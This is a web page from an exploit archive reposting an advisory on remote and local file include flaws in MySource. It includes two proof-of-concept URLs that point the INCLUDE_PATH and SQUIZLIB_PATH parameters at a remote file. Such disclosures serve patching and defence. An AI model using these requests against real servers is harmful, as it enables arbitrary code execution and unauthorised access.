Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Multiple Remote and Local File Include Vulnerabilities in MySource - exploit.company
header-logo
Suggest Exploit
vendor:
MySource
by:
Unknown
7.5
CVSS
HIGH
Remote and Local File Include
Unknown
CWE
Product Name: MySource
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Multiple Remote and Local File Include Vulnerabilities in MySource

The vulnerabilities are caused by a failure in the application to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process, potentially leading to unauthorized access.

Mitigation:

Proper input validation and sanitization should be implemented to prevent file inclusion vulnerabilities. Additionally, restricting access to sensitive files and directories can help mitigate the impact of these vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15133/info

MySource is prone to multiple remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://www.example.com/[file]?
http://www.example.com/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://www.example.com/[file]?

Navigation

Suggest Exploit

Services By CQR